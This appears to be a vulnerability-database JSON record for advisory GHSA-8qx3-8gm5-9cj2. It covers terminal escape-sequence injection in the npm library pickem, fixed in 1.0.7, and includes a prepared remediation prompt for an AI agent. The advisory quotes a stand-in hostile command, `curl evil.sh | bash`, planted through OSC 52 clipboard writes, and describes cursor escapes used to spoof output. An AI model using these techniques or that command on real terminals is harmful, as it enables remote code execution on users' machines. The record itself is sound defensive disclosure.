{"answers":{"affected":"2 open source packages ship an affected version, including pickem.","exploited":"There is no known exploitation of GHSA-8qx3-8gm5-9cj2 in the wild and no public exploit code.","fix":"Upgrade pickem to 1.0.7 or later.","what":"GHSA-8qx3-8gm5-9cj2 is a vulnerability in pickem, published on 25 Aug 2026. It can only be exploited from the same machine or local network, and only if a user opens a file or follows a link."},"fix_prompt":"Check this codebase for GHSA-8qx3-8gm5-9cj2 and fix it if it is affected.\n\nWhat it is: GHSA-8qx3-8gm5-9cj2 is a vulnerability in pickem, published on 25 Aug 2026. It can only be exploited from the same machine or local network, and only if a user opens a file or follows a link.\nExploitation: There is no known exploitation of GHSA-8qx3-8gm5-9cj2 in the wild and no public exploit code.\n\nAffected packages and fixed versions:\n- pickem (npm): affected all versions; fixed in 1.0.7\n- pickem (npm): affected all versions; fixed in 1.0.7\n\nTask:\n1. Search the dependency manifests and lockfiles (for example package.json, package-lock.json, requirements.txt, poetry.lock, uv.lock, pom.xml, build.gradle, go.mod, Cargo.lock, Gemfile.lock) and any Dockerfiles for the affected packages, including transitive dependencies.\n2. If an affected version is in use, upgrade it to the fixed version for its release line with the project's package manager, so the lockfile is regenerated. Prefer the smallest upgrade that fixes it.\n3. If there is no fix, or the upgrade would break the build, do not guess: explain the risk and the safest workaround instead.\n4. Run the tests and summarise what changed and why.\n5. If nothing in the project is affected, say so and change nothing.\n\nReference: https://insights.sbomify.com/GHSA-8qx3-8gm5-9cj2/ (Markdown: https://insights.sbomify.com/GHSA-8qx3-8gm5-9cj2/index.md)","id":"GHSA-8qx3-8gm5-9cj2","markdown":"https://insights.sbomify.com/GHSA-8qx3-8gm5-9cj2/index.md","name":"GHSA-8qx3-8gm5-9cj2","record":{"aliases":[],"analysis":{"component_type":"library","fix_type":"upgrade","impacts":["code_execution","security_bypass"],"network_reachable":"no","non_default_config":false,"product_category":"Node.js CLI library","requires_auth":"none","summary":"Attackers can inject terminal escape sequences via unsanitized item text to spoof UI or poison clipboard, leading to remote code execution when users paste commands.","user_interaction":"required","vuln_class":"other"},"analysis_generated_by":"qwen3.8-flash-next","assigner":null,"cpe":[],"cvss":{"score":null,"severity":null,"source":null,"vector":null,"version":null},"cwes":[],"description":"### Impact\npickem rendered item text (label, description, group, meta, name) to the terminal with no control-character sanitization. `chrome.row` only stripped ANSI from the **active** row; inactive rows, the public `createFormatter`, and selection-summary lines printed labels **raw**, and the ANSI strip missed bare C0 controls anyway.\n\nBecause item text is frequently attacker-controllable (git branch names, PR/issue titles, filenames, npm/API results), a malicious label was a terminal write primitive:\n\n- **OSC 52 clipboard write** — silently load e.g. `curl evil.sh | bash` into the user's clipboard; their next paste-into-shell is RCE.\n- **Cursor-movement + erase** (`ESC[1A`, `ESC[2K`) — overwrite already-printed trusted lines to spoof UI (forge a \"✓ Verified publisher\", fake prompt, or hide a malicious entry).\n- **BEL / C0 control flooding.**\n\nAny CLI that passes untrusted strings into pickem choices is affected.\n\n### Patches\nFixed in **1.0.7**. A new `sanitizeDisplay()` strips every escape sequence except inert SGR (color), plus all C0/C1/DEL control bytes, at the render boundary — applied to every externally-supplied display string across all prompts (`select`, `search`, `checkbox`, `searchable-checkbox`, `input`), `createFormatter`, row meta, and committed selection summaries. Display-only; returned values are unchanged.\n\n### Workarounds\nUpgrade to \u003e= 1.0.7. Otherwise, strip C0/C1/DEL control characters and ANSI escape sequences from any untrusted text before passing it to pickem.","ecosystems":["npm"],"exploits":{"exploitdb":null,"first_seen":null,"github_poc":null,"max_poc_stars":null,"metasploit":null,"nuclei":null,"refs":[],"tier":null},"has_fix":true,"headline":"pickem vulnerable to terminal escape-sequence injection via unsanitized item text","id":"GHSA-8qx3-8gm5-9cj2","indexable":true,"kev":null,"kind":"advisory","links":{"ecosystem":"npm","product":null,"products":[],"type":"other","year":"2026"},"n_packages":2,"n_references":null,"packages":[{"ecosystem":"npm","fixed":["1.0.7"],"introduced":["0"],"last_affected":[],"package":"pickem","purl":null,"source":"GHSA-8qx3-8gm5-9cj2"},{"ecosystem":"npm","fixed":["1.0.7"],"introduced":["0"],"last_affected":[],"package":"pickem","purl":"pkg:npm/pickem","source":"GHSA-8qx3-8gm5-9cj2"}],"products":null,"published":"2026-08-25","related":[],"sources":[{"class":"attribution","licence":"CC BY 4.0","name":"GitHub Advisory Database","prefix":"GHSA"}],"ssvc":{"automatable":null,"exploitation":null,"technical_impact":null},"state":null,"updated":null,"vendors":null},"summary":"Attackers can inject terminal escape sequences via unsanitized item text to spoof UI or poison clipboard, leading to remote code execution when users paste commands.","url":"https://insights.sbomify.com/GHSA-8qx3-8gm5-9cj2/"}